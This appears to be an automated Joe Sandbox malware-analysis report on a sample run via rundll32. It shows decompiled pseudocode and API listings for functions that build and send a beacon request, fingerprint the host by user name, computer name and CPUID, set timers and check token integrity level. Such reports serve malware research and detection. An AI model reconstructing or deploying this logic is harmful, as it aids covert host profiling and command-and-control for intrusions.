                                          				_t60 = __eax;
                                          				_v12 = 8;
                                          				if(__eax == 0) {
                                          					_t60 = GetTickCount();
                                          				}
                                          				_t61 =  *0x4c0d018; // 0x3df0b315
                                          				asm("bswap eax");
                                          				_t62 =  *0x4c0d014; // 0x3a87c8cd
                                          				_t136 = _a16;
                                          				asm("bswap eax");
                                          				_t63 =  *0x4c0d010; // 0xd8d2f808
                                          				asm("bswap eax");
                                          				_t64 =  *0x4c0d00c; // 0x8f8f86c2
                                          				asm("bswap eax");
                                          				_t65 =  *0x4c0d2a4; // 0x97a5a8
                                          				_t3 = _t65 + 0x4c0e633; // 0x74666f73
                                          				_t148 = wsprintfA(_t136, _t3, 3, 0x3d137, _t64, _t63, _t62, _t61,  *0x4c0d02c,  *0x4c0d004, _t60);
                                          				_t68 = E04C057AB();
                                          				_t69 =  *0x4c0d2a4; // 0x97a5a8
                                          				_t4 = _t69 + 0x4c0e673; // 0x74707526
                                          				_t72 = wsprintfA(_t148 + _t136, _t4, _t68);
                                          				_t164 = _t162 + 0x38;
                                          				_t149 = _t148 + _t72; // executed
                                          				_t73 = E04C073E9(_t138); // executed
                                          				_t137 = __imp__;
                                          				_v8 = _t73;
                                          				if(_t73 != 0) {
                                          					_t130 =  *0x4c0d2a4; // 0x97a5a8
                                          					_t7 = _t130 + 0x4c0e8cb; // 0x736e6426
                                          					_t134 = wsprintfA(_a16 + _t149, _t7, _t73);
                                          					_t164 = _t164 + 0xc;
                                          					_t149 = _t149 + _t134;
                                          					HeapFree( *0x4c0d238, 0, _v8);
                                          				}
                                          				_t74 = E04C0614A();
                                          				_v8 = _t74;
                                          				if(_t74 != 0) {
                                          					_t125 =  *0x4c0d2a4; // 0x97a5a8
                                          					_t11 = _t125 + 0x4c0e8d3; // 0x6f687726
                                          					wsprintfA(_t149 + _a16, _t11, _t74);
                                          					_t164 = _t164 + 0xc;
                                          					HeapFree( *0x4c0d238, 0, _v8);
                                          				}
                                          				_t150 =  *0x4c0d324; // 0x55895b0
                                          				_t76 = E04C0757B(0x4c0d00a, _t150 + 4);
                                          				_t156 = 0;
                                          				_v20 = _t76;
                                          				if(_t76 == 0) {
                                          					L26:
                                          					HeapFree( *0x4c0d238, _t156, _a16);
                                          					return _v12;
                                          				} else {
                                          					_t79 = RtlAllocateHeap( *0x4c0d238, 0, 0x800);
                                          					_v8 = _t79;
                                          					if(_t79 == 0) {
                                          						L25:
                                          						HeapFree( *0x4c0d238, _t156, _v20);
                                          						goto L26;
                                          					}
                                          					E04C0749F(GetTickCount());
                                          					_t83 =  *0x4c0d324; // 0x55895b0
                                          					__imp__(_t83 + 0x40);
                                          					asm("lock xadd [eax], ecx");
                                          					_t87 =  *0x4c0d324; // 0x55895b0
                                          					__imp__(_t87 + 0x40);
                                          					_t89 =  *0x4c0d324; // 0x55895b0
                                          					_t152 = E04C04D2C(1, _t147, _a16,  *_t89);
                                          					_v28 = _t152;
                                          					asm("lock xadd [eax], ecx");
                                          					if(_t152 == 0) {
                                          						L24:
                                          						HeapFree( *0x4c0d238, _t156, _v8);
                                          						goto L25;
                                          					}
                                          					StrTrimA(_t152, 0x4c0c294);
                                          					_t95 =  *0x4c0d2a4; // 0x97a5a8
                                          					_push(_t152);
                                          					_t18 = _t95 + 0x4c0e252; // 0x616d692f
                                          					_t97 = E04C09DEF(_t18);
                                          					_v16 = _t97;
                                          					if(_t97 == 0) {
                                          						L23:
                                          						HeapFree( *0x4c0d238, _t156, _t152);
                                          						goto L24;
                                          					}
                                          					_t157 = __imp__;
                                          					 *_t157(_t152, _a4);
                                          					 *_t157(_v8, _v20);
                                          					_t158 = __imp__;
                                          					 *_t158(_v8, _v16);
                                          					 *_t158(_v8, _t152);
                                          					_t104 = E04C0A5E9(0, _v8);
                                          					_a4 = _t104;
                                          					if(_t104 == 0) {
                                          						_v12 = 8;
                                          						L21:
                                          						E04C06106();
                                          						L22:
                                          						HeapFree( *0x4c0d238, 0, _v16);
                                          						_t156 = 0;
                                          						goto L23;
                                          					}
                                          					_t108 = E04C02F2A(_t137, 0xffffffffffffffff, _t152,  &_v24); // executed
                                          					_v12 = _t108;
                                          					if(_t108 == 0) {
                                          						_t161 = _v24;
                                          						_v12 = E04C0A060(_t161, _a4, _a8, _a12);
                                          						_t116 =  *((intOrPtr*)(_t161 + 8));
                                          						 *((intOrPtr*)( *_t116 + 0x80))(_t116);
                                          						_t118 =  *((intOrPtr*)(_t161 + 8));
                                          						 *((intOrPtr*)( *_t118 + 8))(_t118);
                                          						_t120 =  *((intOrPtr*)(_t161 + 4));
                                          						 *((intOrPtr*)( *_t120 + 8))(_t120);
                                          						_t122 =  *_t161;
                                          						 *((intOrPtr*)( *_t122 + 8))(_t122);
                                          						E04C0147E(_t161);
                                          					}
                                          					if(_v12 != 0x10d2) {
                                          						L16:
                                          						if(_v12 == 0) {
                                          							_t110 = _a8;
                                          							if(_t110 != 0) {
                                          								_t153 =  *_t110;
                                          								_t159 =  *_a12;
                                          								wcstombs( *_t110,  *_t110,  *_a12);
                                          								_t113 = E04C01600(_t153, _t153, _t159 >> 1);
                                          								_t152 = _v28;
                                          								 *_a12 = _t113;
                                          							}
                                          						}
                                          						goto L19;
                                          					} else {
                                          						if(_a8 != 0) {
                                          							L19:
                                          							E04C0147E(_a4);
                                          							if(_v12 == 0 || _v12 == 0x10d2) {
                                          								goto L22;
                                          							} else {
                                          								goto L21;
                                          							}
                                          						}
                                          						_v12 = _v12 & 0x00000000;
                                          						goto L16;
                                          					}
                                          				}
                                          			}

                                          APIs
                                          • GetTickCount.KERNEL32 ref: 04C01768
                                          • wsprintfA.USER32 ref: 04C017B8
                                          • wsprintfA.USER32 ref: 04C017D5
                                          • wsprintfA.USER32 ref: 04C01801
                                          • HeapFree.KERNEL32(00000000,?), ref: 04C01813
                                          • wsprintfA.USER32 ref: 04C01834
                                          • HeapFree.KERNEL32(00000000,?), ref: 04C01844
                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04C01872
                                          • GetTickCount.KERNEL32 ref: 04C01883
                                          • RtlEnterCriticalSection.NTDLL(05589570), ref: 04C01897
                                          • RtlLeaveCriticalSection.NTDLL(05589570), ref: 04C018B5
                                            • Part of subcall function 04C04D2C: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,04C052FE,?,055895B0), ref: 04C04D57
                                            • Part of subcall function 04C04D2C: lstrlen.KERNEL32(?,?,?,04C052FE,?,055895B0), ref: 04C04D5F
                                            • Part of subcall function 04C04D2C: strcpy.NTDLL ref: 04C04D76
                                            • Part of subcall function 04C04D2C: lstrcat.KERNEL32(00000000,?), ref: 04C04D81
                                            • Part of subcall function 04C04D2C: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04C052FE,?,055895B0), ref: 04C04D9E
                                          • StrTrimA.SHLWAPI(00000000,04C0C294,?,055895B0), ref: 04C018EC
                                            • Part of subcall function 04C09DEF: lstrlen.KERNEL32(?,00000000,00000000,04C05335,616D692F,00000000), ref: 04C09DFB
                                            • Part of subcall function 04C09DEF: lstrlen.KERNEL32(?), ref: 04C09E03
                                            • Part of subcall function 04C09DEF: lstrcpy.KERNEL32(00000000,?), ref: 04C09E1A
                                            • Part of subcall function 04C09DEF: lstrcat.KERNEL32(00000000,?), ref: 04C09E25
                                          • lstrcpy.KERNEL32(00000000,?), ref: 04C01919
                                          • lstrcpy.KERNEL32(?,?), ref: 04C01921
                                          • lstrcat.KERNEL32(?,?), ref: 04C0192F
                                          • lstrcat.KERNEL32(?,00000000), ref: 04C01935
                                            • Part of subcall function 04C0A5E9: lstrlen.KERNEL32(?,00000000,04C0D330,00000001,04C0937A,04C0D00C,04C0D00C,00000000,00000005,00000000,00000000,?,?,?,04C0207E,?), ref: 04C0A5F2
                                            • Part of subcall function 04C0A5E9: mbstowcs.NTDLL ref: 04C0A619
                                            • Part of subcall function 04C0A5E9: memset.NTDLL ref: 04C0A62B
                                          • wcstombs.NTDLL ref: 04C019C8
                                            • Part of subcall function 04C0A060: SysAllocString.OLEAUT32(?), ref: 04C0A09B
                                            • Part of subcall function 04C0147E: HeapFree.KERNEL32(00000000,00000000,04C01D11,00000000,?,?,-00000008), ref: 04C0148A
                                          • HeapFree.KERNEL32(00000000,?,?), ref: 04C01A09
                                          • HeapFree.KERNEL32(00000000,00000000,616D692F,00000000), ref: 04C01A15
                                          • HeapFree.KERNEL32(00000000,?,?,055895B0), ref: 04C01A21
                                          • HeapFree.KERNEL32(00000000,?), ref: 04C01A2D
                                          • HeapFree.KERNEL32(00000000,?), ref: 04C01A39
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
                                          • String ID:
                                          • API String ID: 3748877296-0
                                          • Opcode ID: 49442c9e0ec4bb6435fb4503178cf091f521186e776fb94e846b5c5b15b07f1d
                                          • Instruction ID: 6fd08248bfe7406f485612fc430fc154946cd14df7e9799d367feb9ecced4cd6
                                          • Opcode Fuzzy Hash: 49442c9e0ec4bb6435fb4503178cf091f521186e776fb94e846b5c5b15b07f1d
                                          • Instruction Fuzzy Hash: 62914E75900108AFDB11DFA8DC44BAEBBBAEF08314F158154F509D72A0DB35ED91DB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 97 4c09b6f-4c09ba1 memset CreateWaitableTimerA 98 4c09d23-4c09d29 GetLastError 97->98 99 4c09ba7-4c09c00 _allmul SetWaitableTimer WaitForMultipleObjects 97->99 100 4c09d2d-4c09d37 98->100 101 4c09c06-4c09c09 99->101 102 4c09c8b-4c09c91 99->102 103 4c09c14 101->103 104 4c09c0b call 4c068cf 101->104 105 4c09c92-4c09c96 102->105 109 4c09c1e 103->109 110 4c09c10-4c09c12 104->110 107 4c09ca6-4c09caa 105->107 108 4c09c98-4c09ca0 HeapFree 105->108 107->105 111 4c09cac-4c09cb6 CloseHandle 107->111 108->107 112 4c09c22-4c09c27 109->112 110->103 110->109 111->100 113 4c09c29-4c09c30 112->113 114 4c09c3a-4c09c5d call 4c09f11 112->114 113->114 115 4c09c32 113->115 117 4c09c62-4c09c68 114->117 115->114 118 4c09cb8-4c09cbd 117->118 119 4c09c6a-4c09c75 117->119 121 4c09cdc-4c09ce4 118->121 122 4c09cbf-4c09cc5 118->122 119->112 120 4c09c77-4c09c87 call 4c054ac 119->120 120->102 124 4c09cea-4c09d18 _allmul SetWaitableTimer WaitForMultipleObjects 121->124 122->102 123 4c09cc7-4c09cda call 4c06106 122->123 123->124 124->112 127 4c09d1e 124->127 127->102
                                          C-Code - Quality: 83%
                                          			E04C09B6F(void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                          				void _v48;
                                          				long _v52;
                                          				struct %anon52 _v60;
                                          				char _v72;
                                          				long _v76;
                                          				void* _v80;
                                          				union _LARGE_INTEGER _v84;
                                          				struct %anon52 _v92;
                                          				void* _v96;
                                          				void* _v100;
                                          				union _LARGE_INTEGER _v104;
                                          				long _v108;
                                          				intOrPtr _v120;
                                          				struct %anon52 _v128;
                                          				struct %anon52 _t46;
                                          				void* _t51;
                                          				long _t53;
                                          				void* _t54;
                                          				struct %anon52 _t60;
                                          				long _t64;
                                          				struct %anon52 _t65;
                                          				void* _t68;
                                          				void* _t72;
                                          				signed int _t73;
                                          				void* _t75;
                                          				void* _t78;
                                          				void** _t82;
                                          				signed int _t86;
                                          				void* _t89;
                                          
                                          				_t75 = __edx;
                                          				_v52 = 0;
                                          				memset( &_v48, 0, 0x2c);
                                          				_t89 = (_t86 & 0xfffffff8) - 0x54 + 0xc;
                                          				_t46 = CreateWaitableTimerA(0, 1, 0);
                                          				_v60 = _t46;
                                          				if(_t46 == 0) {
                                          					_v92.HighPart = GetLastError();
                                          				} else {
                                          					_push(0xffffffff);
                                          					_push(0xff676980);
                                          					_push(0);
                                          					_push( *0x4c0d240);
                                          					_v76 = 0;
                                          					_v80 = 0;
                                          					L04C0B088();
                                          					_v84.LowPart = _t46;
                                          					_v80 = _t75;
                                          					SetWaitableTimer(_v76,  &_v84, 0, 0, 0, 0);
                                          					_t51 =  *0x4c0d26c; // 0x40c
                                          					_v76 = _t51;
                                          					_t53 = WaitForMultipleObjects(2,  &_v80, 0, 0xffffffff);
                                          					_v108 = _t53;
                                          					if(_t53 == 0) {
                                          						if(_a8 != 0) {
                                          							L4:
                                          							 *0x4c0d24c = 5;
                                          						} else {
                                          							_t68 = E04C068CF(); // executed
                                          							if(_t68 != 0) {
                                          								goto L4;
                                          							}
                                          						}
                                          						_v104.LowPart = 0;
                                          						L6:
                                          						L6:
                                          						if(_v104.LowPart == 1 && ( *0x4c0d260 & 0x00000001) == 0) {
                                          							_v104.LowPart = 2;
                                          						}
                                          						_t73 = _v104.LowPart;
                                          						_t58 = _t73 << 4;
                                          						_t78 = _t89 + (_t73 << 4) + 0x3c;
                                          						_t74 = _t73 + 1;
                                          						_v92.LowPart = _t73 + 1;
                                          						_t60 = E04C09F11(_t74, _t78, _t74, _t89 + _t58 + 0x3c, _t78,  &_v96,  &_v100); // executed
                                          						_v128.LowPart = _t60;
                                          						if(_t60 != 0) {
                                          							goto L17;
                                          						}
                                          						_t65 = _v92;
                                          						_v104.LowPart = _t65;
                                          						_t97 = _t65 - 3;
                                          						if(_t65 != 3) {
                                          							goto L6;
                                          						} else {
                                          							_v120 = E04C054AC(_t74, _t97,  &_v72, _a4, _a8);
                                          						}
                                          						goto L12;
                                          						L17:
                                          						__eflags = _t60 - 0x10d2;
                                          						if(_t60 != 0x10d2) {
                                          							_push(0xffffffff);
                                          							_push(0xff676980);
                                          							_push(0);
                                          							_push( *0x4c0d244);
                                          							goto L21;
                                          						} else {
                                          							__eflags =  *0x4c0d248; // 0x0
                                          							if(__eflags == 0) {
                                          								goto L12;
                                          							} else {
                                          								_t60 = E04C06106();
                                          								_push(0xffffffff);
                                          								_push(0xdc3cba00);
                                          								_push(0);
                                          								_push( *0x4c0d248);
                                          								L21:
                                          								L04C0B088();
                                          								_v104.LowPart = _t60;
                                          								_v100 = _t78;
                                          								SetWaitableTimer(_v96,  &_v104, 0, 0, 0, 0);
                                          								_t64 = WaitForMultipleObjects(2,  &_v100, 0, 0xffffffff);
                                          								_v128 = _t64;
                                          								__eflags = _t64;
                                          								if(_t64 == 0) {
                                          									goto L6;
                                          								} else {
                                          									goto L12;
                                          								}
                                          							}
                                          						}
                                          						L25:
                                          					}
                                          					L12:
                                          					_t82 =  &_v72;
                                          					_t72 = 3;
                                          					do {
                                          						_t54 =  *_t82;
                                          						if(_t54 != 0) {
                                          							HeapFree( *0x4c0d238, 0, _t54);
                                          						}
                                          						_t82 =  &(_t82[4]);
                                          						_t72 = _t72 - 1;
                                          					} while (_t72 != 0);
                                          					CloseHandle(_v80);
                                          				}
                                          				return _v92.HighPart;
                                          				goto L25;
                                          			}

































                                          APIs
                                          • memset.NTDLL ref: 04C09B89
                                          • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 04C09B95
                                          • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 04C09BBD
                                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 04C09BDD
                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?,?,?,?,04C04AC4,?), ref: 04C09BF8
                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,04C04AC4,?,00000000), ref: 04C09CA0
                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,04C04AC4,?,00000000,?,?), ref: 04C09CB0
                                          • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 04C09CEA
                                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,?,?), ref: 04C09D04
                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 04C09D10
                                            • Part of subcall function 04C068CF: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05589388,00000000,?,7519F710,00000000,7519F730), ref: 04C0691E
                                            • Part of subcall function 04C068CF: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,055893C0,?,00000000,30314549,00000014,004F0053,0558937C), ref: 04C069BB
                                            • Part of subcall function 04C068CF: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,04C09C10), ref: 04C069CD
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,04C04AC4,?,00000000,?,?), ref: 04C09D23
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                          • String ID:
                                          • API String ID: 3521023985-0
                                          • Opcode ID: 31c6a0e535f7e66171dd72c51b4adfdeaf084449d869b8998fa57114e1fe81d6
                                          • Instruction ID: 3d5628a3d2cf4409c6b009be096d982123674987290cf38903f9aa127b9a6e02
                                          • Opcode Fuzzy Hash: 31c6a0e535f7e66171dd72c51b4adfdeaf084449d869b8998fa57114e1fe81d6
                                          • Instruction Fuzzy Hash: 01519DF1409320AFD720EF55DC44EABBBE9EF85724F408A19F8A582191D774EA44CF92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          C-Code - Quality: 74%
                                          			E04C01A4E(intOrPtr __edx, void** _a4, void** _a8) {
                                          				intOrPtr _v8;
                                          				struct _FILETIME* _v12;
                                          				short _v56;
                                          				struct _FILETIME* _t12;
                                          				intOrPtr _t13;
                                          				void* _t17;
                                          				void* _t21;
                                          				intOrPtr _t27;
                                          				long _t28;
                                          				void* _t30;
                                          
                                          				_t27 = __edx;
                                          				_t12 =  &_v12;
                                          				GetSystemTimeAsFileTime(_t12);
                                          				_push(0x192);
                                          				_push(0x54d38000);
                                          				_push(_v8);
                                          				_push(_v12);
                                          				L04C0B082();
                                          				_push(_t12);
                                          				_v12 = _t12;
                                          				_t13 =  *0x4c0d2a4; // 0x97a5a8
                                          				_t5 = _t13 + 0x4c0e836; // 0x5588dde
                                          				_t6 = _t13 + 0x4c0e59c; // 0x530025
                                          				_push(0x16);
                                          				_push( &_v56);
                                          				_v8 = _t27;
                                          				L04C0AD1A();
                                          				_t17 = CreateFileMappingW(0xffffffff, 0x4c0d2a8, 4, 0, 0x1000,  &_v56); // executed
                                          				_t30 = _t17;
                                          				if(_t30 == 0) {
                                          					_t28 = GetLastError();
                                          				} else {
                                          					if(GetLastError() == 0xb7) {
                                          						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
                                          						if(_t21 == 0) {
                                          							_t28 = GetLastError();
                                          							if(_t28 != 0) {
                                          								goto L6;
                                          							}
                                          						} else {
                                          							 *_a4 = _t30;
                                          							 *_a8 = _t21;
                                          							_t28 = 0;
                                          						}
                                          					} else {
                                          						_t28 = 2;
                                          						L6:
                                          						CloseHandle(_t30);
                                          					}
                                          				}
                                          				return _t28;
                                          			}














                                          APIs
                                          • GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,04C04996,?,?,4D283A53,?,?), ref: 04C01A5A
                                          • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 04C01A70
                                          • _snwprintf.NTDLL ref: 04C01A95
                                          • CreateFileMappingW.KERNELBASE(000000FF,04C0D2A8,00000004,00000000,00001000,?,?,?,?,?,00000000), ref: 04C01AB1
                                          • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,04C04996,?,?,4D283A53,?), ref: 04C01AC3
                                          • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,?,?,00000000), ref: 04C01ADA
                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,?,04C04996,?,?,4D283A53), ref: 04C01AFB
                                          • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,04C04996,?,?,4D283A53,?), ref: 04C01B03
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                          • String ID:
                                          • API String ID: 1814172918-0
                                          • Opcode ID: ad931e930db8035e230d0cdcd563aedb4381da1995371822254e036658011a3b
                                          • Instruction ID: 661242075122de284a6bbc3821feb9a8fa50c4d32ddc832e620b2f93af253b2f
                                          • Opcode Fuzzy Hash: ad931e930db8035e230d0cdcd563aedb4381da1995371822254e036658011a3b
                                          • Instruction Fuzzy Hash: FE21C3B6640204BFD721EBA8CC45F9A77BAEB44705F1A8221F606E71C0EB75EA45CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 139 4c093d5-4c093e9 140 4c093f3-4c09405 call 4c06f89 139->140 141 4c093eb-4c093f0 139->141 144 4c09407-4c09417 GetUserNameW 140->144 145 4c09459-4c09466 140->145 141->140 146 4c09468-4c0947f GetComputerNameW 144->146 147 4c09419-4c09429 RtlAllocateHeap 144->147 145->146 148 4c09481-4c09492 RtlAllocateHeap 146->148 149 4c094bd-4c094e1 146->149 147->146 150 4c0942b-4c09438 GetUserNameW 147->150 148->149 151 4c09494-4c0949d GetComputerNameW 148->151 152 4c09448-4c09457 HeapFree 150->152 153 4c0943a-4c09446 call 4c07cf7 150->153 154 4c094ae-4c094b7 HeapFree 151->154 155 4c0949f-4c094ab call 4c07cf7 151->155 152->146 153->152 154->149 155->154
                                          C-Code - Quality: 96%
                                          			E04C093D5(char __eax, void* __esi) {
                                          				long _v8;
                                          				char _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				signed int _v28;
                                          				long _t34;
                                          				signed int _t39;
                                          				long _t50;
                                          				char _t59;
                                          				intOrPtr _t61;
                                          				void* _t62;
                                          				void* _t64;
                                          				char _t65;
                                          				intOrPtr* _t67;
                                          				void* _t68;
                                          				void* _t69;
                                          
                                          				_t69 = __esi;
                                          				_t65 = __eax;
                                          				_v8 = 0;
                                          				_v12 = __eax;
                                          				if(__eax == 0) {
                                          					_t59 =  *0x4c0d270; // 0xd448b889
                                          					_v12 = _t59;
                                          				}
                                          				_t64 = _t69;
                                          				E04C06F89( &_v12, _t64);
                                          				if(_t65 != 0) {
                                          					 *_t69 =  *_t69 ^  *0x4c0d2a0 ^ 0x76f6612d;
                                          				} else {
                                          					GetUserNameW(0,  &_v8); // executed
                                          					_t50 = _v8;
                                          					if(_t50 != 0) {
                                          						_t62 = RtlAllocateHeap( *0x4c0d238, 0, _t50 + _t50);
                                          						if(_t62 != 0) {
                                          							if(GetUserNameW(_t62,  &_v8) != 0) {
                                          								_t64 = _t62;
                                          								 *_t69 =  *_t69 ^ E04C07CF7(_v8 + _v8, _t64);
                                          							}
                                          							HeapFree( *0x4c0d238, 0, _t62);
                                          						}
                                          					}
                                          				}
                                          				_t61 = __imp__;
                                          				_v8 = _v8 & 0x00000000;
                                          				GetComputerNameW(0,  &_v8);
                                          				_t34 = _v8;
                                          				if(_t34 != 0) {
                                          					_t68 = RtlAllocateHeap( *0x4c0d238, 0, _t34 + _t34);
                                          					if(_t68 != 0) {
                                          						if(GetComputerNameW(_t68,  &_v8) != 0) {
                                          							_t64 = _t68;
                                          							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E04C07CF7(_v8 + _v8, _t64);
                                          						}
                                          						HeapFree( *0x4c0d238, 0, _t68);
                                          					}
                                          				}
                                          				asm("cpuid");
                                          				_t67 =  &_v28;
                                          				 *_t67 = 1;
                                          				 *((intOrPtr*)(_t67 + 4)) = _t61;
                                          				 *((intOrPtr*)(_t67 + 8)) = 0;
                                          				 *(_t67 + 0xc) = _t64;
                                          				_t39 = _v16 ^ _v20 ^ _v28;
                                          				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
                                          				return _t39;
                                          			}

                                          APIs
                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 04C0940C
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 04C09423
                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 04C09430
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04C09451
                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 04C09478
                                          • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04C0948C
                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 04C09499
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04C094B7
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: HeapName$AllocateComputerFreeUser
                                          • String ID:
                                          • API String ID: 3239747167-0
                                          • Opcode ID: 751e1800eb1c3b2180873ce83c7319467ed712e6d541a1ac38302dd423b7b32a
                                          • Instruction ID: a0caf3d1717360d8f740b74918d152d0cb5d344974bc9e2012fcfd85736714ef
                                          • Opcode Fuzzy Hash: 751e1800eb1c3b2180873ce83c7319467ed712e6d541a1ac38302dd423b7b32a
                                          • Instruction Fuzzy Hash: C03139B5A00209EFEB10DFA9D880BAEB7FAFF44304F528569E505D7291D734EE419B10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          C-Code - Quality: 100%
                                          			E04C053E3(long* _a4) {
                                          				long _v8;
                                          				void* _v12;
                                          				void _v16;
                                          				long _v20;
                                          				int _t33;
                                          				void* _t46;
                                          
                                          				_v16 = 1;
                                          				_v20 = 0x2000;
                                          				if( *0x4c0d25c > 5) {
                                          					_v16 = 0;
                                          					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
                                          						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
                                          						_v8 = 0;
                                          						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
                                          						if(_v8 != 0) {
                                          							_t46 = E04C058BE(_v8);
                                          							if(_t46 != 0) {
                                          								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
                                          								if(_t33 != 0) {
                                          									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
                                          								}
                                          								E04C0147E(_t46);
                                          							}
                                          						}
                                          						CloseHandle(_v12);
                                          					}
                                          				}
                                          				 *_a4 = _v20;
                                          				return _v16;
                                          			}

                                          APIs
                                          • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 04C05415
                                          • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 04C05435
                                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 04C05445
                                          • CloseHandle.KERNEL32(00000000), ref: 04C05495
                                            • Part of subcall function 04C058BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04C01C51), ref: 04C058CA
                                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 04C05468
                                          • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 04C05470
                                          • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 04C05480
                                          Similarity
                                          • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                          • String ID:
                                          • API String ID: 1295030180-0
